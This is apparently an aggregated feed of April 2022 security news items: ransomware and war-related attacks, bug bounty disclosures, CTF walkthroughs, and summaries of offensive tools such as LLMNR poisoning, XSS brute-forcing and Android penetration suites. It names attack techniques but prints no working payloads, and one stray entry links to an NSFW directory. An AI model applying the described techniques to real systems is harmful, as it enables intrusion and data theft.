    Reportedly, the hacker group NB65 has developed new ransomware by modifying the leaked Conti ransomware source code in order to attack Russia. Since the outbreak of the Russia-Ukraine war, the group has joined forces with the Anonymous hacker group to attack multiple Russian targets, including the All-Russia State Television and Radio Broadcasting Company (VGTRK) and the Russian space agency Roscosmos. Since late March, NB65 has developed new ransomware from the leaked Conti source code and has gradually begun using it to launch cyberattacks against Russian entities…
    Anonymous teams up with the Ukrainian IT Army to continue attacking Russian entities
    The Anonymous hacker group and the Ukrainian IT ARMY will continue to launch cyberattacks against Russian government entities and private enterprises.
    Facebook blocked Russian and Belarusian cyberattacks targeting Ukraine
    Recently, social networking giant Facebook (Meta) disclosed that Russia-linked attackers were attempting to weaponize the social network against Ukraine.
    Hackers exploit the Spring4Shell vulnerability to deploy Mirai malware
    Security researchers have found that the Spring4Shell vulnerability is being heavily exploited by attackers to execute the Mirai malware and deploy botnets. In April 2022, the Mirai malware began appearing in large numbers in the Singapore region.
    Disguised as antivirus software, the SharkBot banking trojan spreads via Google Play
    CPR team researchers discovered several malicious Android apps in Google Play disguised as antivirus software and used to spread the SharkBot banking trojan.
  • Open

    The Hacker Playbook 3: is it still relevant?
    If you have read technical books on computer science, you will know that they have the disadvantage of becoming obsolete fairly quickly… Continue reading on Medium »
  • Open

    NSFW. folders by year-month. random pics met-art ftv etc.
    submitted by /u/thats_dumberst [link] [comments]

  • Open

    Exploiting BITB with advanced open redirect
    BITB, despite being old, is only being popularly known now, so I will briefly explain what it is, whoever knows, can jump from this to the… Continue reading on Medium »
    There’s $20 up for grabs in this post
    I have been hosting a challenge for my readers with a reward of $20. No one has claimed it yet, the prize is still up for grabs. Continue reading on Medium »
    Running Decentralized, and Community Oriented Bug Bounties
    Bug bounties are not a new thing, but web 3 has challenged security trends, expanding project’s needs, and creating a deep desire for… Continue reading on Medium »
    Exposing Thousands of Indian Railways Outlets’ private data.
    Don’t just use the features, try to exploit them. — Unknown Continue reading on Medium »
    Privacy Disclosure on Facebook Lite after Creating a Post
    Hello, Continue reading on Medium »
    Complete Guide To Start Bug Bounty In 2022
    Hey everyone! Today we learn how you can start your bug bounty journey and how you can become a successful bug bounty hunter! Continue reading on InfoSec Write-ups »
    shonydanza-a-customizable-easy-to-navigate-tool-for-researching-pen-testing-and-defending-with-the-p…
    Continue reading on Medium »
    crawpy-yet-another-content-discovery-tool
    Yet another content discovery tool written in python. Continue reading on Medium »
    4-zero-3–403–401-bypass-methods-bash-automation
    >_ Introduction Continue reading on Medium »
    Wordlistgen — Quickly Generate Context-Specific Wordlists For Content Discovery From Lists Of URLs…
    wordlistgen is a tool to pass a list of URLs and get back a list of relevant words for your wordlists. Wordlists are much more effective… Continue reading on Medium »
  • Open

    How does forcing the user to re-login every couple hours help a web app security?
    At work we have an internal web app. About every 2 hours the app will automatically log you out (even if you were using the app continuously, non-stop, during that period). I asked why, and the answer was: it is a policy forced by higher security authorities in the organization. All computers at work go to sleep in 10 minutes if not used and require entering the password. The question: how does forcing the user to re-login every so often help in web app security? submitted by /u/esamcoding [link] [comments]
    List of protocols that are using TLS & their well known ports?
    I'm looking for (or trying to compile) a list of protocols that are using TLS (implicit, not via STARTTLS), including their well known ports. Like... https: 443 smtps (implicit): 465 imaps: 993 pop3s: 995 ldaps: 636 ftps (implicit): 990 telnet over TLS: 23 and 992 MS Global Catalog SSL 3269 What other protocols belong to this list? Edit: Adding new ports as they are being mentioned. submitted by /u/e_hyde [link] [comments]
    Is it possible to provide incorruptible integrity without authentication?
    Say I want to send a message and prove integrity without worrying about authentication or confidentiality. Is this theoretically possible? From my understanding authentication is sort of a by product of most popular integrity schemes. I'm new to this so sorry if this is a super obvious question. EDIT: Better formulated: "is there a way to send a message over an insecure channel, where integrity is guaranteed but confidentiality or authentication are not". My understanding is no, since you'd have to encrypt the hash which would require a symmetric or asymmetric key exchange which would provide authentication. I understand now that the answer is definitely "no" submitted by /u/jacobjr23 [link] [comments]
    Readings Topic Recommendations Wanted
    Hey guys, I want some advice on a reading list of topics as a junior pentester. I've done a couple of certs, including the OSCP, but I feel that I need to learn the foundational knowledge of things like networks and services, so I can start strong. What topics do you guys feel that every pentester should know outside of a CTF-esque environment? Thanks in advance submitted by /u/lifeover9000 [link] [comments]
    Does anyone else find this meterpreter sessions on his system?
    Hi, when I scan my PC with Antipwny this comes up. Can anyone confirm if their chrome or NordVPN also has open Meterpreter sessions? Also any tips on how to proceed with this? submitted by /u/Sudden-Pin-9480 [link] [comments]
    Phishing URL detection system?
    As my final year project I'm doing a phishing URL detection system using deep learning. I started it as research, and to provide a product I'm working on deploying the models using Flask (a simple web application), because I thought that when it comes to phishing attacks, URLs have a significant role to play. The first model was created using NLP (natural language processing) and I used an LSTM to train it. The second model was created using feature-based processing. I read some research papers and extracted simple features which I can work with (e.g. if the domain includes an '@' sign that can be a phishing URL, so giving a value of '1' for those). The NLP-based model gave me around 97% accuracy and the feature-based model gave me around 88% accuracy. But when I try those models with new URLs (that I didn't use to train the models) they don't give me the results I expect. Is there any solution for that? Overall I'm asking: is my project good enough? What are your ideas to improve it more? Any idea that you guys have will be helpful. Thank you <3 submitted by /u/lowiqstudent69 [link] [comments]
    Anyone have experience building a Windows AD lab environment in Docker?
    Goal The closest thing I've found to what I'm attempting is this stream. From the description: It is common for people to use spare hardware switches, routers, firewalls, and servers. For years, I used VMware workstation on desktops with multiple SSDs and lots of RAM so I could simulate a dozen VMs. But is there an easier way? Can we simulate hundreds of systems on a desktop. With Docker, I think we can. - cyberlibrarian However, this video was only a rough guide, as far as I can tell the code wasn't published, and only the early networking setup is covered. Context Our org doesn't provide the kind of lab we need so we've been trying to set up an AD testing environment on a hobbyist budget. And that's a low-end (enlisted / E4 pay) "hobbyist budget" not an "I make 6 figures" hobb…
  • Open

    THM: Attacktive Directory
    In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing… Continue reading on InfoSec Write-ups »
    [HTB] Jerry — Walkthrough w/o Metasploit
    This time we are here to talk about Jerry, a retired and easy-to-solve machine on HTB, which can nonetheless give us an understanding… Continue reading on Medium »
  • Open

    Threat Actor Profile - FIN7
    submitted by /u/RandyMarsh_Lorde [link] [comments]
  • Open

    War in Ukraine / April 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Useful and interesting webinars
    Continue reading on Medium »
    Good News Roundup: a KBJ-inspired Geek edition
    This week we celebrate Judge Ketanji Brown Jackson’s historic confirmation to the Supreme Court, OSINT wins for Ukraine, and more geek… Continue reading on Medium »
    SPY NEWS: 2022 — Week 14
    Summary of the espionage-related news stories for the Week 14 (3–9 April) of 2022. Continue reading on Medium »
    Use Android to hunt down Social Media accounts with SHERLOCK
    About — Sherlock, a powerful command line tool provided by Sherlock Project, can be used to find usernames across many social networks. It… Continue reading on Medium »
    OSINT With Buscador
    OSINT stands for Open Source Intelligence and is the practice of scraping the internet for publicly available information. This… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-10 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    [Cullinan #31] Add Six, Update Two 🪴
    This is Cullinan log #31. There are quite a few changes this time. I added 6 new entries and added some content to Path traversal and SSRF. There are many entries I am currently writing up or that have caught my eye, so I expect to be updating various things for a while. Add OAST Add Threat Modeling Add Log Injection Add XSHM Add LaTex Injection Add Brute Force Update Path Traversal #RCE with log poisoning Update SSRF #Bypass with AAAA Record Oh, and XSS… there is too much to organize at once, so I think it will need a bit more time 😵‍💫
  • Open

    Help understanding a small evtx file with 8 events.
    Hi community, I'm going through the EVTX ATTACK SAMPLES github repo, and I chose a random one from the Lateral Movement category. I opened the file, which includes 8 events, and I can't really understand why this file would be considered suspicious (link is below). Is this because of the calc.exe? Or does it look like pass-the-hash attempts? (logon type 3/key length 0). If there is a resource that maybe explains the EVTX files in the repo, that would be great as a self-learning tool, but I could not find anything like that. Thanks in advance :) https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Lateral%20Movement/LM_WMI_4624_4688_TargetHost.evtx submitted by /u/HeliosHype [link] [comments]
    Forensically investigating docx files
    I'm looking at a docx sent to me by a rising star colleague in another team. Unlike what they've sent me in other cases, the docx has had its metadata scrubbed in Word (i.e. 0 minutes editing for a 3400 word document). However they've somehow neglected to remove authorship IDs. One of the ids is the colleague, the other is 'admin'. Is there any easy way to determine if the document has an origin outside our org? We do have a pretty good culture here, and I'd really prefer being able to have a diplomatic solution supported by evidence. If I can take some meaningful points for discussion about information sharing to the other team that would probably be ideal, but I don't want to do this without having something more concrete than suspicions. I've tried looking through it in Python with ZipFile and XML, as well as with docx, but it doesn't give me much more information that I could use. I've used regex to pull all weblinks, and there's nothing beyond internal links and the usual fare of links to MS and standards orgs. About the only thing is that it has some unusual fonts listed that I'd not expect to see in Australia, but are maybe a standard rollout? i.e. a Cherokee and an East Asian font of some sort. If anyone has suggestions that would be great. If not, I might just have to have a slower chat up the chain and stop sharing our strategy documents for now. submitted by /u/horror4802 [link] [comments]
  • Open

    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on System Weakness »
    XSS: your SPA is highly vulnerable!
    Introduction: Continue reading on Medium »
  • Open

    IBM's public FTP server with manuals and marketing material and posters etc.
    ftp.www.ibm.com submitted by /u/ShipGiftsToTurkey [link] [comments]

  • Open

    The Journey to get “SQL Injection” at BluePay (BLUE Indonesia BluePay) — 2019
    Hello, In this article I want to share my experience getting SQL Injection on BluePay (BLUE Indonesia BluePay). I found this vulnerability… Continue reading on Medium »
    Android Pentesting Setup On Macbook M1
    Hello hackers, Continue reading on Medium »
    Subdomain Takeover and How the things evolved with Domain Verification
    It is possible that a successful execution of Subdomain Takeover will be critical in exploitation since an attacker will be able to carry… Continue reading on CodeX »
    Axelar Network's bug hunting program
    Program overview Continue reading on Medium »
    Optimized DNS and HTTP Log Tool for pentesters
    eyes.sh 1.0.1 Continue reading on Medium »
    LayerZero Security Update — April 2022
    The past week has shown us that nothing is more important than a commitment to continuously assessing and improving security in this space… Continue reading on Medium »
  • Open

    [HTB] Legacy — Walkthrough w/o Metasploit
    Legacy is a retired HTB machine, and the first post on this page is about its solution. Continue reading on Medium »
    Office Multiple Search Order DLL Hijacking
    by: Tamir Yehuda(Tamirye94), Hai Vaknin(vakninhai), Noam Pomerantz, Hoshea Yarden, Ben Amar and Roy Kopit Continue reading on Medium »
  • Open

    Filipino OPM karaoke files?
    Is there a way to download OPM karaoke songs? I tried to search and download the whole magic sing archive but I could not find one. submitted by /u/Sabtreal23 [link] [comments]
  • Open

    Firewall analysis: A portable graph based approach
    submitted by /u/DiabloHorn [link] [comments]
    socialhunter: crawls the website and finds broken social media links that can be hijacked
    submitted by /u/utku1337 [link] [comments]
    Wrote about Azure AD Consent bypass - disclosure
    submitted by /u/jsantasalo [link] [comments]
  • Open

    Tools for Decoding MP3 Steganography
    Any recommended tools for decoding MP3 steganography that support Linux and MacOS? submitted by /u/KnowledgeMammoth1714 [link] [comments]
    Why shouldn't I trust Google Password Manager and Microsoft/Edge Password Manager? Aren't they supposed to be some of the most secure given that they are made by those two giant companies?
    I honestly find these two to have the absolute best seamless syncing and integration across ALL platforms (Android, iOS, MacOS, Linux, Windows). They just work so well and it's painless. They do what they should without any unnecessary bells and whistles: manage passwords. What I love about Google Password Manager is that it lets you encrypt your passwords with a custom passphrase that won't be the same as your Google password. Edge lets you choose a device-specific passphrase that prompts you to enter before auto-filling anything. Controversies and all the discussion about privacy aside, I tend to trust companies like Google and Microsoft in terms of security. Given that they both have to deal with things like HIPAA and FedRAMP as part of their cloud service, I just can't doubt their expertise in having excellent security practices. So why wouldn't I trust a service like Google or Edge for managing my passwords if: (1) I have a 36+ character password on my account, (2) use YubiKey, (3) always enable device-specific extra password for Edge / enable encryption with custom passphrase in Google Password Manager. I am only interested in simply storing my passwords. I NEVER trust any service with my credit card info or bitcoin wallet seedphrase. I already use KeePass on an air-gapped device for storing such data and I never store the database anywhere online. submitted by /u/egobamyasi [link] [comments]
    Automatically onboarding/offboarding employees/contractors
    Not sure if anyone has similar issues. My team has been using quite a few SaaS tools in our daily work. Every time a new employee/contractor comes, I need to manually add them to every software, and I will need to remove them when they leave. I feel it is a waste of time to do it manually, and it is possible I might miss some. Has anyone come across automation tools or scripts to make it less manual? submitted by /u/Calm_Scene [link] [comments]
  • Open

    Insecure Storage of Sensitive Information on lonestarcell.com server
    MTN Group disclosed a bug submitted by muhnad: https://hackerone.com/reports/1482830
    HTML injection through Invite Teammate email
    SecurityScorecard disclosed a bug submitted by cryptoknight028: https://hackerone.com/reports/1482057
    Folder architecture and file sizes of private file drop shares can be obtained
    Nextcloud disclosed a bug submitted by shakierbellows: https://hackerone.com/reports/1337422 - Bounty: $500
    Found Origin IP's Lead To Access To kraden.com
    Kraden disclosed a bug submitted by 4bhin8v: https://hackerone.com/reports/1531183 - Bounty: $100
    Host Header Injection leads to Open Redirect and Content Spoofing or Text Injection.
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1444675 - Bounty: $300
  • Open

    A Detailed Guide on Responder (LLMNR Poisoning)
    Introduction Responder is a widely used tool in penetration test scenarios and can be used for lateral movement across the network by red teamers. The post A Detailed Guide on Responder (LLMNR Poisoning) appeared first on Hacking Articles.
  • Open

    OSI MODEL
    FULL FORM OF OSI. If you want to know the full form of OSI and learn about the OSI model, then you are in the right place. OSI full… Continue reading on Medium »
    War in Ukraine / April 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Find users of popular services by time and place…
    The following selection of services is designed to collect data about content (posts, photos, videos) posted at a specific point in time… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-09 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    Brute Force
    🔍 Introduction A Brute Force attack is an attack technique that generates repeated web requests based on a given wordlist or character pattern in order to create security problems. The concept is similar to Fuzzing, but whereas Fuzzing sends malformed data to induce faults in a service, Brute force sends a large amount of data to find an accepted value, as in an attack on a password. In cryptography it means trying every possible value to break a particular cipher. 🗡 Offensive techniques Testing method Brute force is usually tested using a brute forcer or a fuzzer, or by writing a separate script.
    Speeding up ZAP scans with Context Technology
    ZAP's Context (Scope) has an item called Technology. It lives under Context > Technology, and if you look closely there is a list of various technologies such as DB, Language and OS, each with a checkbox. All are checked by default. So what is it for? Is it simply for recording the technologies the service uses? Of course not. This Technology item is closely tied to ActiveScan. As one example, looking at the SQL Injection part of the ActiveScan rule code shows why. The code contains argument values such as Tech.MySQL and Tech.MsSQL, and these are the values used to map ActiveScan rules to Technology.
    LaTex Injection
    🔍 Introduction LaTex is a typesetting system that uses TeX syntax; injecting TeX syntax into a system that processes it, so that it performs actions the attacker wants, is called LaTex Injection. TeX is a syntax for easily entering and using characters of special form, such as mathematical formulas, and is widely used for writing documents on computers. For details, the TeX syntax page on wikipedia gives a rough idea of what it covers. Example 1 \frac{\pi}{2} = \int_{-1}^{1} \sqrt{1-x^2}\ dx 🗡 Offensive techniques Detect It is generally most likely to be found in file conversion related features.
  • Open

    GCFA examination
    I recently took the SANS FOR500 class and passed my GCFE at 86%. Next up is the FOR508 and GCFA exam. Reaching out to the community to see if anyone has some insight into how the 2 exams compare and if I should expect to put more into the GCFA exam than I had to with the GCFE, or if I index and study the same amount as it took me to pass the GCFE at 86%, do you think I'll be fine with the GCFA? I've seen some previous posts here indicating the GCFA is difficult. Thanks ahead of time for any pointers and feedback! Edit: before anyone points it out, I realize the content of the exam will be different; I'm just wanting to know if anyone has some experience with how they compare in terms of preparation and time commitment. Also, in case this helps: I'm not required by my job to have these certifications. I'm just fortunate enough to have been given the opportunity to take those courses and certifications and would rather pass them, although it isn't a requirement. submitted by /u/Ckn0wt [link] [comments]
  • Open

    Some .htaccess tricks for file upload
    .htaccess is a configuration file for web servers running Apache Web Server.
    Wireshark packet capture: packet loss analysis?
    If the captured pcap has dropped packets, it will affect the final results of the security test.
  • Open

    New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns
    A new version of SolarMarker malware appears to upgrade evasion abilities and demonstrates that the infostealer and backdoor continues to evolve. The post New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns appeared first on Unit42.

  • Open

    Discord Group for Cybersecurity jobs.
    I made a Discord for people who are looking to build their careers into Cyber Security. https://discord.gg/tMwHKufn submitted by /u/Shazeb02 [link] [comments]
    Which vulnerability in ASUS routers was exploited to install the Cyclops Blink malware?
    So I've read the report by Trend Micro and the analysis by UK NCSC. They explain how it acts and becomes persistent, but nowhere can I read which vulnerability was exploited to actually install the malware in the first place? ASUS says in its statement: Please note that if you choose not to install this new firmware version then, to avoid any potential unwanted intrusion, we strongly recommend that you disable remote access from WAN and reset your router to its default settings. So one can only guess that there is/was an easily exploitable vulnerability in the remote access function? submitted by /u/ogiakul [link] [comments]
    Print full lines on match in Yara
    How can I have Yara print the full lines for any line found matching a Yara rule? By default it will only print the string found and not the full line the string was found in, and I don't see an option to do that. submitted by /u/ZappaBeefheart [link] [comments]
    Sysmon Tuning Help - Event ID 7 - Image Loaded
    I'm trying to wrap my head around logging for Event ID 7 - Image Loaded events - notoriously a noisy one but obviously a lot of value there. Hoping someone out there has gotten pretty intimate with logging and tuning this particular ID. What approach have you taken towards tuning? There's just a ton of processes in the environment that are always loading .dll's all over the place and I don't have a detailed understanding of the avenues for exploitation here. If I exclude an Image and ImageLoaded combination because it generates a lot of noise, what about that one time an adversary is able to swap in a malicious .dll for the one that is normally legitimate? Or is the idea to catch something loading an image from a location it does not normally load from? One suggestion from the logging cheat sheet is to consider only logging events where the image is unsigned, but you may miss an event where an adversary is able to load something that appears signed but is not. submitted by /u/IHadADreamIWasAMeme [link] [comments]
    20YOE Staff+ Software Engineer at a FAANG. Been interested in netsec since I was a kid. Should I switch? CAN I switch?
    I used to wardial. I used to "creatively" use VMBs to make free international phone calls. I ran a hacker BBS from '94 to '99. I went to my first DefCon before the year 2000. I phreaked. I wrote my first code at four years old on a computer with sixteen kilobytes of RAM and was cracking software when I was eleven (and was dumb enough to put my real name on the title screen...). I used to be an op on #hack and #2600. I've read every volume of TCP/IP Illustrated cover to cover and still remember what each bit does in an IPv4 datagram. I remember when the early issues of Phrack went out and there were so many copies being sent that it would routinely slow down mail delivery across the entire internet. Basically, I love this shit. At the same time, I get an utterly ridiculous amount of money …
    What would be the best certification to get first?
    I wanted to learn coding, so I started at HTML and CSS, and then I decided that cyber security was really sounding interesting, so I started learning Python. I am currently taking Angela Yu's 100 Days of Code course on Udemy. I was considering doing a cyber security bootcamp at a college nearby, but I heard that boot camps are kind of a waste of money. So I want to be able to get something on my resume to be able to get a job. It seems like certifications are the best way of doing that. I want to know which certification would be the best bang for the buck. Which certification would look really good on an application that is also not too complicated for beginners? submitted by /u/bluntsmoker_420 [link] [comments]
    Getting into scripting Zeek vs Python
    I'm trying to get more insight into scripting for networking security purposes. Does anyone have a preference of using zeek vs python? Should I learn python before zeek? Is there anything more beneficial of using one language vs the other? Thanks! submitted by /u/alkior70 [link] [comments]
  • Open

    carpunk-the-car-hacking-toolkit
    CARPUNK IS VERY SIMILAR TO CANghost, THE ONLY DIFFERENCE IS, IT COMES WITH OPTIONS TO ENABLE OR DISABLE INTERFACE AND BASIC SNIFFING AS… Continue reading on Medium »
    Scrummage — The Ultimate OSINT And Threat Hunting Framework
    VERSION 3.6 Continue reading on Medium »
    smersh-a-pentest-oriented-collaborative-tool-used-to-track-the-progress-of-your-companys-missions
    Smersh is a pentest oriented collaborative tool used to track the progress of your company’s missions and generate rapport. Preview front… Continue reading on Medium »
    af-shellhunter-auto-shell-lookup
    AF-ShellHunter: Auto shell lookup Continue reading on Medium »
  • Open

    Exploiting a Use-After-Free on PHP to bypass disable_functions
    submitted by /u/gid0rah [link] [comments]
    Microsoft Trusts the Client! Simple Bypass for the Defender for Cloud Apps Proxy
    submitted by /u/BugroSoft [link] [comments]
    Russia’s certificate authority for sanctioned organizations
    submitted by /u/koenrh [link] [comments]
    ImpressCMS: from unauthenticated SQL injection to RCE
    submitted by /u/eg1x [link] [comments]
    Exploiting CVE-2022-0778, a bug in OpenSSL vis-à-vis WebRTC platforms
    submitted by /u/EnableSecurity [link] [comments]
  • Open

    Ukraine — Situation update as of 9 April
    The last 24 hours Continue reading on Medium »
    MY EXPERIENCE AS A JUDGE ON TRACELABS CTF SEARCH PARTY 2022
    This was my first year being a judge in the Tracelabs CTF search party competition. To be able to fully judge the submissions that came in… Continue reading on Medium »
    War in Ukraine / April 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Helping the investigative reporter…
    Save is an easy-to-use app designed to help you store, share and enhance your mobile media while protecting your identity. for iOS… Continue reading on Medium »
    My cryptocurrency investigation toolkit…
    Hello! I tried to collect most of the sources in one collection, ranging from blockchain explorers, universal explorers (allowing you to… Continue reading on Medium »
  • Open

    [Security Bulletin] VMware officially fixes multiple Workspace ONE Access vuln...
    Recently, VMware released patches for multiple vulnerabilities in Workspace ONE Access (formerly VMware Identity Manager), among which a server-side template injection vulnerability leading to remote command execution was disclosed (C...
  • Open

    Using browser APIs a bit more safely with the Permissions-Policy header
    Today I want to talk briefly about the Permissions-Policy (formerly Feature Policy) header. Permissions-Policy Permissions Policy, also known as Feature Policy, is a security policy header that defines a mechanism allowing developers to selectively enable and disable the use of various browser features and APIs. Its overall behaviour is similar to CSP (Content-Security-Policy). However, where CSP is a policy that restricts, Permissions Policy is a policy that controls features. The features referred to here are browser capabilities such as the camera and GPS. The syntax, like CSP, is specified as a directive and an allowlist. Permissions-Policy Permissions-Policy: directive=(allowlist), directive=(allowlist)
    XSHM (Cross Site History Manipulation)
    🔍 Introduction XSHM (Cross Site History Manipulation) is an attack method that makes use of the user's browser history; it can be used for anything from simple phishing that changes the previous history entry so the user is taken to a page the attacker intends, to bypassing the SOP or stealing sensitive information using CSRF or an IFRAME. https://developer.mozilla.org/en-US/docs/Web/API/Window/history https://developer.mozilla.org/en-US/docs/Web/API/History However, the part that allowed the history to be changed was history.pushState('','','https://www.hahwul.com/fafa') history.replaceState('','','https://www.hahwul.com/z') 🗡 Offensive techniques Detect This attack method does not work on its own; it requires script insertion on a page the attacker can control, such as via XSS or an uploaded file.
  • Open

    SecWiki News 2022-04-08 Review
    Persistence by overriding Powershell cmdlets by 风迷 A beautiful side channel: from timeless attack to pipeline amplification attack by ourren MITRE ATT&CKcon 3.0 Presentations on SlideShare by ourren For more of the latest articles, visit SecWiki
  • Open

    The Case for 2FA by Default for WordPress
    Administrator panel compromises are one of the most common attacks that everyday WordPress website admins face. We work with thousands of clients who have encountered attacks on their websites and I’ve long ago lost count of the number of times that I’ve told clients that the point of entry was their WordPress login page. Brute force attacks and compromised administrator users are overwhelmingly the most common attack vectors for the CMS platform, which as of 2022 makes up over 40% of the entire web. Continue reading The Case for 2FA by Default for WordPress at Sucuri Blog.
  • Open

    Timestomping Registry Keys
    If you've worked in DFIR or threat intel for any amount of time, you've likely either seen or heard how threat actors modify systems to meet their own needs, configuring systems to provide data or hide their activities, as they make their way through an infrastructure. From disabling services, to modifying the system to maintain credentials in memory in plain text, to clearing Windows Event Logs, sometimes it seems that the threat actor knows more about the platform than the administrators. These system modifications are used to either provide easier access to the threat actor, or hide the impacts of their activities by "blinding" the administrators, or simply by removing clear evidence of the activity. Sometimes these system modifications go beyond the administrators, and are meant to instead…
  • Open

    Binary Exploitation (Pwn) Challenge Walkthroughs - PicoCTF 2022 (BEGINNER-FRIENDLY)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    FreeBuf Morning Report | FIN7 member sentenced to 5 years in prison; global supply chain attacks surged 51% in the second half of 2021
    Denys Iarmak, a senior member of the cybercrime group FIN7, was sentenced to five years in prison by a US judge on Thursday local time.
    零时科技 | Analysis of the APE attack
    An attacker could obtain the APE airdrop by swapping into NFTs with a flash loan and then returning the NFTs to repay the flash loan, which poses a threat to the project.
    The first malware specifically targeting the AWS Lambda serverless platform has appeared
    The malware uses newer command-and-control traffic address resolution techniques to evade typical detection measures and virtual network access controls.
    FIN7 hacker group member sentenced to 5 years in prison
    A penetration tester of the FIN7 hacker group was sentenced to 5 years in prison for stealing credit card information.
    FreeBuf enterprise group discussion | Let's talk about enterprise API security
    Insecure APIs have become one of the main targets of attackers. How should we avoid this, and what would a relatively secure API look like?
    Website of Russian oil giant Gazprom Neft shut down after hacker attack
    The website of Gazprom Neft, the oil division of Russian state gas company Gazprom, was forced to shut down after a hacker attack.
    Google improves Android security with new development policies
    On April 6, Google announced several key policy updates for Android app developers to improve the security of users, Google Play and related apps.
    FreeBuf Weekly | Major vulnerability exposed in Samsung phones; Fox News leaks 13 million records
    Fox News leaked 13 million records, including employee information.
    Global Advanced Persistent Threat (APT) Annual Report 2021
    The Beijing area and the coastal provinces of Guangdong, Fujian, Zhejiang and Jiangsu, as China's political centre and economically developed regions, are the main target areas for cyberattacks by foreign APT groups.
    Under multiple layers of regulation, who is still "mining"?
    With regulation of virtual currency "mining" continuing to tighten since 2021, who is still mining?
  • Open

    Movies and assorted stuff.
    submitted by /u/omnifage [link] [comments]
  • Open

    Duqu malware | Cybersecurity
    submitted by /u/OkFaithlessness2414 [link] [comments]
    Any good threat hunting resources? Looking for query libraries.
    Currently using Sigma and Microsoft query libraries. New to threat hunting, and looking to learn more about resources that are out there. Thanks. submitted by /u/haloman882 [link] [comments]
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview

  • Open

    PCI DSS v4.0 Resource Hub
    submitted by /u/Pomerium_CMo [link] [comments]
    fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
    submitted by /u/mazen160 [link] [comments]
    Denonia: The First Malware Specifically Targeting Lambda
    submitted by /u/lormayna [link] [comments]
    SpiderFoot 4.0 release - introducing YAML correlation rules
    submitted by /u/smicallef [link] [comments]
    Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
    submitted by /u/alt3kx [link] [comments]
  • Open

    A penetration test of the HackMyVM comprehensive range: Helium
    The content of this range is very realistic; it is for technical discussion and learning only. Do not use it for illegal purposes; any illegal use has nothing to do with the author!
    FreeBuf Morning Report | Google removes several apps that collect user data; NIO employee exposed for mining with company servers
    The person involved is reportedly a NIO employee who previously served as administrator of a cluster server. While employed, he used his position to mine cryptocurrency on company servers.
    Cash App data breach may affect 8.2 million US users
    US payments giant Block recently disclosed a data breach related to its investment app Cash App and notified its 8.2 million US users.
    Critical vulnerabilities disclosed in multiple VMware products
    Critical vulnerabilities exist in multiple VMware products that attackers can exploit to launch remote code execution attacks.
    South African and US investigators jointly raid BEC fraud gang
    South African and US investigators jointly arrested several members of a fraud gang linked to the notorious Nigerian business email compromise (BEC) group.
    Be alert! New malware FFDroider targets Facebook and other social accounts
    Zscaler researchers say the malware hijacks victims' social media accounts by stealing credentials and cookies stored in browsers.
    BruteXSS: XSS brute-force tool
    This article introduces a tool that automatically inserts XSS payloads and supports custom payloads.
    Android penetration testing suite zANTI v2.5 released (with detailed instructions)
    zANTI is a penetration testing tool for the Android platform that supports sniffing the connected network, man-in-the-middle testing, port scanning, cookie capture and router security testing.
    Web version of Nmap: Rainmap Lite
    Rainmap Lite is a web application for Nmap that lets users launch Nmap scans from a phone, tablet or web browser!
  • Open

    Ukraine — Situation update as of April 8
    The last 24 hours Continue reading on Medium »
    Linux console utilities for domain network reconnaissance
    By "network reconnaissance" we mean gathering information about a domain from open sources, that is, Open Source Intelligence (OSINT). In this article I… Continue reading on KR. LABORATORIES IT BLOG »
    Linux console utilities for domain network reconnaissance
    By "network reconnaissance" we mean gathering information about a domain from open sources, that is, Open Source Intelligence (OSINT). In this article I… Continue reading on Medium »
    War in Ukraine / April 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Logging information about users through news
    Let’s talk about masking logged links using the https://telegra.ph/ Continue reading on Medium »
    Virtual OSINT labs…
    Small topic. But without it, you just can’t. Virtual OSINT labs that will be useful for security researchers as well. Choose your…… Continue reading on Medium »
  • Open

    Exposed Golang Pprof debugger at https://cn-geo1.uber.com/
    Uber disclosed a bug submitted by boobalan123: https://hackerone.com/reports/1385906 - Bounty: $500
    Chain of IDORs Between U4B and Vouchers APIs Allows Attackers to View and Modify Program/Voucher Policies and to Obtain Organization Employees' PII
    Uber disclosed a bug submitted by hunt4p1zza: https://hackerone.com/reports/1148697 - Bounty: $10250
    Reflected XSS on []
    U.S. Dept Of Defense disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1267380
    [www.] Path-based reflected Cross Site Scripting
    U.S. Dept Of Defense disclosed a bug submitted by geeknik: https://hackerone.com/reports/1159371
    [CVE-2020-3452] on
    U.S. Dept Of Defense disclosed a bug submitted by splint3rsec: https://hackerone.com/reports/1234925
    username and password leaked via pptx for website
    U.S. Dept Of Defense disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1512199
    Broken access control, can lead to legitimate user data loss
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1493007
    Authorization bypass -> IDOR -> PII Leakage
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489470
    Cross-site Scripting (XSS) - Reflected at https:///
    U.S. Dept Of Defense disclosed a bug submitted by mamunwhh: https://hackerone.com/reports/1370746
    SQL Injection in
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489744
    XSS on https:///' parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252020
    XSS on https:/// parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252229
